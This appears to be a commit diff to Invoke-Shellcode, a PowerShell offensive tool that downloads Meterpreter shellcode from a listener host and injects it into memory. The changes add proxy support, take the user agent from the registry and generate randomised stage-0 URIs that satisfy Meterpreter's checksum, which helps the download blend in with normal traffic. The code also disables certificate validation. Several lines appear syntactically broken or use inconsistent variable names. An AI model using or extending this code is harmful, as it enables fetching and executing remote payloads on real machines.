@@ -49,6 +49,14 @@ Specifies the metasploit payload to use. Currently, only 'windows/meterpreter/re
4949
5050Optionally specifies the user agent to use when using meterpreter http or https payloads
5151
52+ . PARAMETER Proxy
53+
54+ Optionally specifies whether to utilize the proxy settings on the machine.
55+
56+ . PARAMETER Legacy
57+
58+ Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future.
59+
5260. PARAMETER Force
5361
5462Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
@@ -179,7 +187,17 @@ http://www.exploit-monday.com
179187 [Parameter ( ParameterSetName = ' Metasploit'
180188 [ValidateNotNull ()]
181189 [String ]
182- $UserAgent = ' Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' ,
190+ $UserAgent = (Get-ItemProperty - Path ' HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ' User Agent' ,
191+
192+ [Parameter ( ParameterSetName = ' Metasploit'
193+ [ValidateNotNull ()]
194+ [Switch ]
195+ $Legacy = $False ,
196+
197+ [Parameter ( ParameterSetName = ' Metasploit'
198+ [ValidateNotNull ()]
199+ [Switch ]
200+ $Proxy = $False ,
183201
184202 [Switch ]
185203 $Force = $False
@@ -586,18 +604,51 @@ http://www.exploit-monday.com
586604 {
587605 $SSL = ' s'
588606 # Accept invalid certificates
589- [System.Net.ServicePointManager ]::ServerCertificateValidationCallback = { $true }
607+ [System.Net.ServicePointManager ]::ServerCertificateValidationCallback = {$True }
590608 }
591609 }
592610
593- # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
594- $Request = " http$ ( $SSL ) ://$ ( $Lhost ) :$ ( $Lport ) /INITM"
595- Write-Verbose " Requesting meterpreter payload from $Request "
596-
611+ if ($Legacy )
612+ {
613+ # Old Meterpreter handler expects 'INITM' in the URI in order to initiate stage 0
614+ $Request = " http$ ( $SSL ) ://$ ( $Lhost ) :$ ( $Lport ) /INITM"
615+ Write-Verbose " Requesting meterpreter payload from $Request "
616+ } else {
617+
618+ # Generate a URI that passes the test
619+ $CharArray = 48 .. 57 + 65 .. 90 + 97 .. 122 | ForEach-Object {[Char ]$_ }
620+ $SumTest = $False
621+
622+ while ($SumTest -eq $False )
623+ {
624+ $GeneratedUri = $CharArray | Get-Random - Count 4
625+ $SumTest = (([int []] $GeneratedUri | Measure-Object - Sum).Sum % 0x100 -eq 92 )
626+ }
627+
628+ $RequestUri = -join $GeneratedUri
629+
630+ $Request = " http$ ( $SSL ) ://$ ( $Lhost ) :$ ( $Lport ) /$ ( $RequestUri ) "
631+ }
632+
597633 $Uri = New-Object Uri($Request )
598634 $WebClient = New-Object System.Net.WebClient
599635 $WebClient.Headers.Add (' user-agent' , " $UserAgent "
600636
637+ if ($Proxy )
638+ {
639+ $WebProxyObject = New-Object System.Net.WebProxy
640+ $ProxyAddress = (Get-ItemProperty - Path ' HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
641+
642+ # if there is no proxy set, then continue without it
643+ if ($ProxyAddress )
644+ {
645+
646+ $WebProxyObject.Address = $ProxyAddress
647+ $WebProxyObject.UseDefaultCredentials = $True
648+ $WebClientObject.Proxy = $WebProxyObject
649+ }
650+ }
651+
601652 try
602653 {
603654 [Byte []] $Shellcode32 = $WebClient.DownloadData ($Uri )
@@ -708,6 +759,5 @@ http://www.exploit-monday.com
708759 {
709760 Inject- LocalShellcode
710761 }
711- }
712-
762+ }
713763}
0 commit comments